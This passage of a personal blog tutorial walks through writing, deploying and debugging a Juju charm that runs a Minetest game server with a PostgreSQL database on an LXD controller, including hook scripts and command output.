<p><code class="language-plaintext highlighter-rouge">status-set</code> changes the status displayed by <code class="language-plaintext highlighter-rouge">juju status</code>, and <code class="language-plaintext highlighter-rouge">blocked</code> is pretty
self-explanatory.</p>
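<p>For reference, the workload states <code class="language-plaintext highlighter-rouge">status-set</code> accepts are <code class="language-plaintext highlighter-rouge">maintenance</code>,
<code class="language-plaintext highlighter-rouge">blocked</code>, <code class="language-plaintext highlighter-rouge">waiting</code> and <code class="language-plaintext highlighter-rouge">active</code>, each taking an optional message:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Long-running setup work
status-set maintenance "Installing packages"
# Cannot proceed until the operator adds a relation
status-set blocked "Waiting for database connection"
# Everything is up and running
status-set active
</code></pre></div></div>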
<h3 id="db-relation-changed-hook">‘db-relation-changed’ Hook</h3>
<p>Now that our install is waiting on a database connection, we had better sort
out what happens when we connect our database via a relation. In this case, we
want to populate our <code class="language-plaintext highlighter-rouge">world.mt</code> file, with database credentials and such.</p>
<p>We can do that with the <code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/bash
set -e
status-set maintenance "Configuring the database"
db_user=$(relation-get user)
db_database=$(relation-get database)
db_pass=$(relation-get password)
db_host=$(relation-get private-address)
db_port=5432
if [ -z "$db_user" ]; then
juju-log "No database information sent yet. Silently exiting"
exit 0
fi
juju-log "Got database credentials. Making new database"
cat >> /home/minetest/.minetest/worlds/world/world.mt << EOF
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host=$db_host port=$db_port user=$db_user password=$db_pass dbname=$db_database
pgsql_player_connection = host=$db_host port=$db_port user=$db_user password=$db_pass dbname=$db_database
EOF
juju-log "Starting Minetest service"
systemctl restart minetest
status-set active
</code></pre></div></div>
<p>Charms need to communicate over their relations to exchange important data. For
our <code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook, we want to talk to the PostgreSQL Charm to obtain
database credentials that Minetest will use to connect and access the database.</p>
<p>We can do that with the hook tools <code class="language-plaintext highlighter-rouge">relation-get</code> to obtain variables, and
<code class="language-plaintext highlighter-rouge">relation-set</code> to send variables to the other Charm.</p>
<p>We used <code class="language-plaintext highlighter-rouge">relation-get user</code> to fetch the username, and <code class="language-plaintext highlighter-rouge">relation-get password</code>
for the database user’s password. These are all randomly generated when we
add the relation, so we can’t just hardcode these values.</p>
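<p>For the other direction, here is a short sketch of what publishing data on the
relation looks like. The <code class="language-plaintext highlighter-rouge">database</code> key is, as far as I can tell, one the
PostgreSQL Charm honours for requesting a specific database name; the rest is
generic hook tool usage:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Ask the PostgreSQL Charm for a database with a specific name
relation-set database=minetest

# Dump everything the remote unit has published on this relation
relation-get - postgresql/0
</code></pre></div></div>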
<h3 id="config-changed-hook">‘config-changed’ Hook</h3>
<p>The <code class="language-plaintext highlighter-rouge">config-changed</code> hook reacts to any changes made to the Charm’s configuration,
writes those changes to the backing configuration file, and normally makes
an attempt at restarting the underlying service.</p>
<p>We can use the hook tool <code class="language-plaintext highlighter-rouge">config-get</code> to query the current value of a
configuration setting, and set it into the file with <code class="language-plaintext highlighter-rouge">sed</code> commands. The
<code class="language-plaintext highlighter-rouge">config-changed</code> hook in <a href="https://api.jujucharms.com/charmstore/v5/~jamestait/precise/minetest-server-2/archive/hooks/config-changed">James Tait’s older minetest charm</a>
does this very well.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
CONFIG_FILE=/home/minetest/.minetest/worlds/world/world.mt
PORT=`config-get port`
if [ ! -z "$PORT" ]; then
sed -i -e "s/^port \= .*/port \= ${PORT}/" $CONFIG_FILE
fi
open-port $PORT/udp
SERVER_NAME=`config-get server-name`
if [ ! -z "$SERVER_NAME" ]; then
sed -i -e "s/^server_name \= .*/server_name \= ${SERVER_NAME}/" $CONFIG_FILE
fi
DESCRIPTION=`config-get server-description`
if [ ! -z "$DESCRIPTION" ]; then
sed -i -e "s/^server_description \= .*/server_description \= ${DESCRIPTION}/" $CONFIG_FILE
fi
MOTD=`config-get motd`
if [ ! -z "$MOTD" ]; then
sed -i -e "s/^motd \= .*/motd \= ${MOTD}/" $CONFIG_FILE
fi
STRICT_PROTOCOL_VERSION_CHECKING=`config-get strict-protocol-version-checking`
if [ ! -z "$STRICT_PROTO_VERSION" ]; then
sed -i -e "s/^strict_protocol_version_checking \= .*/strict_protocol_version_checking \= ${STRICT_PROTOCOL_VERSION_CHECKING}/" $CONFIG_FILE
fi
CREATIVE_MODE=`config-get creative-mode`
if [ ! -z "$CREATIVE_MODE" ]; then
sed -i -e "s/^creative_mode \= .*/creative_mode \= ${CREATIVE_MODE}/" $CONFIG_FILE
fi
ENABLE_DAMAGE=`config-get enable-damage`
if [ ! -z "$ENABLE_DAMAGE" ]; then
sed -i -e "s/^enable_damage \= .*/enable_damage \= ${ENABLE_DAMAGE}/" $CONFIG_FILE
fi
DEFAULT_PASSWORD=`config-get default-password`
if [ ! -z "$DEFAULT_PASSWORD" ]; then
sed -i -e "s/^default_password \= .*/default_password \= ${DEFAULT_PASSWORD}/" $CONFIG_FILE
fi
DEFAULT_PRIVS=`config-get default-privs`
if [ ! -z "$DEFAULT_PRIVS" ]; then
sed -i -e "s/^default_privs \= .*/default_privs \= ${DEFAULT_PRIVS}/" $CONFIG_FILE
fi
ENABLE_PVP=`config-get enable-pvp`
if [ ! -z "$ENABLE_PVP" ]; then
sed -i -e "s/^enable_pvp \= .*/enable_pvp \= ${ENABLE_PVP}/" $CONFIG_FILE
fi
</code></pre></div></div>
<p>The more interesting part of the hook is right at the top with the <code class="language-plaintext highlighter-rouge">open-port</code>
hook tool. Since we can change what port the server binds to, we need to be able
to tell Juju what port to expose to the user. <code class="language-plaintext highlighter-rouge">open-port</code> does exactly this.</p>
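<p>Note that ports opened this way only become reachable once the operator runs
<code class="language-plaintext highlighter-rouge">juju expose</code>, which we will do later. There are matching hook tools to inspect
and undo the operation:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Inside a hook or debug-hooks session
open-port 30000/udp
opened-ports
close-port 30000/udp
</code></pre></div></div>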
<h3 id="mark-all-hooks-as-executable">Mark All Hooks as Executable</h3>
<p>All hook files need to be executable, so we need to ensure they are marked as
such. Do a quick <code class="language-plaintext highlighter-rouge">chmod</code> over the contents of the <code class="language-plaintext highlighter-rouge">hooks</code> directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ chmod +x ~/charms/minetest-server/hooks/*
</code></pre></div></div>
<h2 id="deploying-the-charm">Deploying the Charm</h2>
<p>Now that we have our Charm written, we need to test it to ensure it works, and
debug it if it doesn’t. To do that, we are going to deploy it under debug mode
and keep track of its progress.</p>
<h3 id="make-a-juju-controller">Make a Juju Controller</h3>
<p>Since this is Juju, we need to have a controller running if we don’t already
have one configured. We are going to use LXD as our backing cloud to keep this
easy.</p>
<p>I’m going to make my controller use eoan as the operating system, so I will set
<code class="language-plaintext highlighter-rouge">--bootstrap-series=eoan</code> when creating the controller.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju bootstrap --bootstrap-series=eoan localhost lxd-controller
Creating Juju controller "lxd-controller" on localhost/localhost
Looking for packaged Juju agent version 2.7.0 for amd64
To configure your system to better support LXD containers, please see: https://github.com/lxc/lxd/blob/master/doc/production-setup.md
Launching controller instance(s) on localhost/localhost...
- juju-9fba67-0 (arch=amd64)
Installing Juju agent on bootstrap instance
Fetching Juju GUI 2.15.0
Waiting for address
Attempting to connect to 10.72.102.88:22
Connected to 10.72.102.88
Running machine configuration script...
Host key fingerprint is SHA256:WWJ5Rrtbd0pNIPgNX1DYpuBq1PcnipRpiqIAVNKYMko
+---[RSA 2048]----+
| .+. ... o=.|
|oEo. o..o...+|
|+o + =+ = +.|
|o . *..+ =o |
|. S..+..o.o|
|. Bo o.oo|
|. . =.. ....|
| . . . . . . |
| .. . |
+----[SHA256]-----+
Bootstrap agent now started
Contacting Juju controller at 10.72.102.88 to verify accessibility...
Bootstrap complete, controller "lxd-controller" now is available
Controller machines are in the "controller" model
Initial model "default" added
</code></pre></div></div>
<p>After that, we can check the status of <code class="language-plaintext highlighter-rouge">juju controllers</code> to make sure our
controller has been registered correctly:</p>
<p><img src="/assets/images/2019_272.png" alt="controller" /></p>
<p>Since we now have an active controller, we can also query <code class="language-plaintext highlighter-rouge">juju status</code> which
should be empty:</p>
<p><img src="/assets/images/2019_273.png" alt="status" /></p>
<h3 id="deploy-the-postgresql-charm">Deploy the PostgreSQL Charm</h3>
<p>Our Minetest Charm depends on the PostgreSQL charm, so we will go ahead and
deploy that first.</p>
<p>Searching the <a href="https://jaas.ai">Charm Store</a> brings us to the <a href="https://jaas.ai/postgresql/199">PostgreSQL Charm</a>,
which we can deploy with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju deploy postgresql
</code></pre></div></div>
<p>This gives us a single standalone PostgreSQL instance. The Charm supports
clustering and such, but we won’t go to such efforts for our little Minetest
world.</p>
<p>From there Juju will go and create a new bionic container and install PostgreSQL.</p>
<p>We can check <code class="language-plaintext highlighter-rouge">juju status</code> to keep tabs on progress.</p>
<p><img src="/assets/images/2019_274.png" alt="status" /></p>
<h3 id="deploy-the-minetest-charm">Deploy the Minetest Charm</h3>
<p>Here comes the moment of truth. Let’s deploy our Minetest Charm!</p>
<p>Firstly, in case this goes horribly wrong, we will watch the debug logs. Open up
a terminal tab and run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju debug-log
</code></pre></div></div>
<p>This lets us follow along, at a very low level, with what Juju is doing.</p>
<p>We can deploy our local charm by simply referencing the directory it lives in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju deploy ~/charms/minetest-server --series eoan
Deploying charm "local:eoan/minetest-server-0".
</code></pre></div></div>
<p>Now we can check Juju status to see how it went:</p>
<p><img src="/assets/images/2019_275.png" alt="status" /></p>
<p>As you can see, my deploy went badly and got stuck on the install hook. Seems
I forgot to set apt to automatically answer yes to commands. Ah well.</p>
<p>If this happens to you, you can remove the machine with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju remove-machine 1 --force
removing machine 1
- will remove unit minetest-server/0
$ juju remove-application minetest-server
removing application minetest-server
</code></pre></div></div>
<p>Just make sure you get the correct machine number from <code class="language-plaintext highlighter-rouge">juju status</code>.</p>
<p>Fix your mistakes, and then try and try again:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju deploy ~/charms/minetest-server --series eoan
Deploying charm "local:eoan/minetest-server-0".
</code></pre></div></div>
<p>Eventually after enough revisions of fixing things, our Charm will be deployed
and will be waiting for a database connection:</p>
<p><img src="/assets/images/2019_277.png" alt="blocked" /></p>
<p>Time to get Minetest connected to PostgreSQL.</p>
<h3 id="add-relations">Add Relations</h3>
<p>As we learned in the previous blog post, relations are connections between two
Charms, where a Charm provides a service to another. In this case, we want the
PostgreSQL Charm to offer database services to Minetest.</p>
<p>We can add a relation with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju add-relation postgresql:db minetest-server:db
</code></pre></div></div>
<p>Juju will automatically go and call the <code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook in the
minetest-server Charm, and also call the same hook in the postgresql Charm. The
PostgreSQL Charm will go and create a new user and database, and set up passwords
and permissions properly, so everything is ready for us to <code class="language-plaintext highlighter-rouge">relation-get</code> the
information from our <code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook.</p>
<p>We probably want to verify that everything went well, since this was a particular
pain point in writing my charm.</p>
<p>We can issue <code class="language-plaintext highlighter-rouge">juju ssh</code> to get into the minetest-server unit, and from there
look to see if there are any database credentials in <code class="language-plaintext highlighter-rouge">world.mt</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju ssh 3
ubuntu@juju-adfa12-2:~$ cd /home/minetest/.minetest/worlds/world/
ubuntu@juju-adfa12-2:/home/minetest/.minetest/worlds/world$ ll
total 21444
drwxr-xr-x 2 minetest minetest 4096 Dec 1 21:46 ./
drwxr-xr-x 3 minetest minetest 4096 Dec 1 21:46 ../
-rw-r--r-- 1 minetest minetest 1054 Dec 1 22:04 world.mt
ubuntu@juju-adfa12-2:/home/minetest/.minetest/worlds/world$ cat world.mt
port = 30000
server_name = Minetest server
server_description = Juju deployed Minetest server
motd = Welcome!
strict_protocol_version_checking = false
creative_mode = false
enable_damage = false
default_password =
default_privs = build,shout
enable_pvp = true
gameid = minetest
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host=10.72.102.206 port=5432 user=juju_minetest-server password=6yrPy37rM3GbPdzyZJGX29W5sX6jZdxJgYkJGF dbname=minetest-server
pgsql_player_connection = host=10.72.102.206 port=5432 user=juju_minetest-server password=6yrPy37rM3GbPdzyZJGX29W5sX6jZdxJgYkJGF dbname=minetest-server
</code></pre></div></div>
<p>Wow! Everything actually worked! Man, am I happy to see those credentials there.</p>
<p>Checking <code class="language-plaintext highlighter-rouge">juju status</code> once more should yield everything is okay:</p>
<p><img src="/assets/images/2019_278.png" alt="status" /></p>
<p>Time for the moment of truth. Can we connect to our server?</p>
<h3 id="start-minetest-client-and-connect-to-server">Start Minetest Client and Connect to Server</h3>
<p>There’s one more thing we have to do before enjoying a game of Minetest, and that
is opening the port of the game up to the world.</p>
<p>We can do this with <code class="language-plaintext highlighter-rouge">juju expose</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju expose minetest-server
</code></pre></div></div>
<p>Go ahead and open up Minetest on your computer and click the “Join Game” tab.
From <code class="language-plaintext highlighter-rouge">juju status</code> we see our Minetest server is running on <code class="language-plaintext highlighter-rouge">10.72.102.109</code> on
the default port of <code class="language-plaintext highlighter-rouge">30000</code>.</p>
<p><img src="/assets/images/2019_279.png" alt="connect" /></p>
<p>Hit connect and…</p>
<p><img src="/assets/images/2019_280.png" alt="game" /></p>
<p>We are in the game, on a Juju deployed server!</p>
<h3 id="changing-and-reloading-configuration">Changing and Reloading Configuration</h3>
<p>Now that we can play the game, if we want to change any of the configuration
settings we wrote into the charm, we can use the Juju GUI, or the command line.</p>
<p>We can issue <code class="language-plaintext highlighter-rouge">juju config</code> to get a list of configuration options:</p>
<p><img src="/assets/images/2019_281.png" alt="config" /></p>
<p>We can change it by issuing <code class="language-plaintext highlighter-rouge">juju config</code> followed by a list of options:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju config minetest-server creative-mode=true
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">start</code> hook is automatically run after <code class="language-plaintext highlighter-rouge">config-changed</code>, which means once
<code class="language-plaintext highlighter-rouge">config-changed</code> has finished modifying the <code class="language-plaintext highlighter-rouge">world.mt</code> configuration file, the
server will automatically be restarted and the changes applied.</p>
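<p>To double check that the change actually landed, you can grep the configuration
file on the unit (assuming machine 3 is still the minetest-server machine, as in
the earlier <code class="language-plaintext highlighter-rouge">juju ssh</code> example):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju ssh 3 -- grep creative_mode /home/minetest/.minetest/worlds/world/world.mt
creative_mode = true
</code></pre></div></div>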
<h2 id="debugging-the-charm">Debugging the Charm</h2>
<p>There will be times when you are writing your Charm and things just don’t work
as intended. Here are some ways that you can get more information on what is
happening.</p>
<h3 id="getting-juju-logs">Getting Juju Logs</h3>
<p>As mentioned before, if you run <code class="language-plaintext highlighter-rouge">juju debug-log</code> in another tab, you can keep
track of events, like specific hooks firing, and you can see a lot of detailed
error messages. This is the first place to look.</p>
<p><img src="/assets/images/2019_270.png" alt="debug" /></p>
<h3 id="manually-running-hooks">Manually Running Hooks</h3>
<p>Sometimes if your hooks aren’t working correctly, and you would like to debug
further, you can switch to an internal <code class="language-plaintext highlighter-rouge">tmux</code> session in Juju by running
<code class="language-plaintext highlighter-rouge">juju debug-hooks <application>/<unit id></code>.</p>
<p>For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju debug-hooks minetest-server/2
</code></pre></div></div>
<p><img src="/assets/images/2019_282.png" alt="tmux" /></p>
<p>This will allow you to run hook tools, such as <code class="language-plaintext highlighter-rouge">config-get</code>, <code class="language-plaintext highlighter-rouge">config-set</code>,
<code class="language-plaintext highlighter-rouge">relation-list</code>, <code class="language-plaintext highlighter-rouge">relation-get</code> and <code class="language-plaintext highlighter-rouge">relation-set</code>. For the relation tools, you
need to have a relation added first, and it usually works best when you remove
the relation, enter hook debugging, then re-add the relation while you are in
the tmux session.</p>
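<p>That dance looks something like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju remove-relation postgresql:db minetest-server:db
$ juju debug-hooks minetest-server/2
# then, from a second terminal:
$ juju add-relation postgresql:db minetest-server:db
</code></pre></div></div>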
<p>From here you can run your hooks, and since they are supposed to be idempotent,
you can keep running them and examining the system to see if your live changes
to the hooks work. The tmux session has vi and nano, so feel free to edit your
hooks on the fly.</p>
<p>The tmux session is already in the directory of your Charm, and you are root,
so you can modify anything.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@juju-adfa12-3:/var/lib/juju/agents/unit-minetest-server-2/charm# ls
README config.yaml copyright hooks icon.svg metadata.yaml revision
</code></pre></div></div>
<p>Hook debugging really helped me to get this Charm working.</p>
<h2 id="cleaning-up">Cleaning Up</h2>
<p>Once we have finished, we can shut down our services and remove them by issuing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju remove-application minetest-server
removing application minetest-server
$ juju remove-application postgresql
removing application postgresql
</code></pre></div></div>
<p>To clean up our controller, we can issue <code class="language-plaintext highlighter-rouge">juju destroy-controller</code>. Note that
this will remove all deployments in all models, so you should be sure you
really want to do this before you run it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>juju destroy-controller lxd-controller --destroy-all-models
WARNING! This command will destroy the "lxd-controller" controller.
This includes all machines, applications, data and other resources.
Continue? (y/N):y
Destroying controller
Waiting for hosted model resources to be reclaimed
Waiting on 1 model
All hosted models reclaimed, cleaning up controller machines
</code></pre></div></div>
<p>That’s it. All machines have been destroyed and we are back to a clean slate.</p>
<h1 id="conclusion">Conclusion</h1>
<p>There we have it. We wrote our first Charm, and successfully managed to Juju
deploy a Minetest server backed by a PostgreSQL database.</p>
<p>Along the way we learned what each part of the original method for writing
Charms does, how to operate hook tools and debug our Charm.</p>
<p>Maybe now I can actually sit down and play the game instead of spending all this
time writing the Charm, haha.</p>
<p>Hopefully you enjoyed the read, and as always feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellIn my previous blog post about Juju, a tool which lets you deploy and scale software easily, we learned what Juju is, how to deploy some common software packages, debug them, and scale them. Juju deploys Charms, a set of instructions on how to install, configure and scale a particular software package. To be able to deploy software as a Charm, a Charm has to be written first. Usually Charms are written by experts in operating that software package, so that the Charm represents the best way to configure and tune that application. But what happens if no Charm exists for something you want to deploy? Today we are going to learn how to write our own Charms using the original Charm writing method, by making a Charm for the Minetest game server. So fire up your favourite text editor, and lets get started.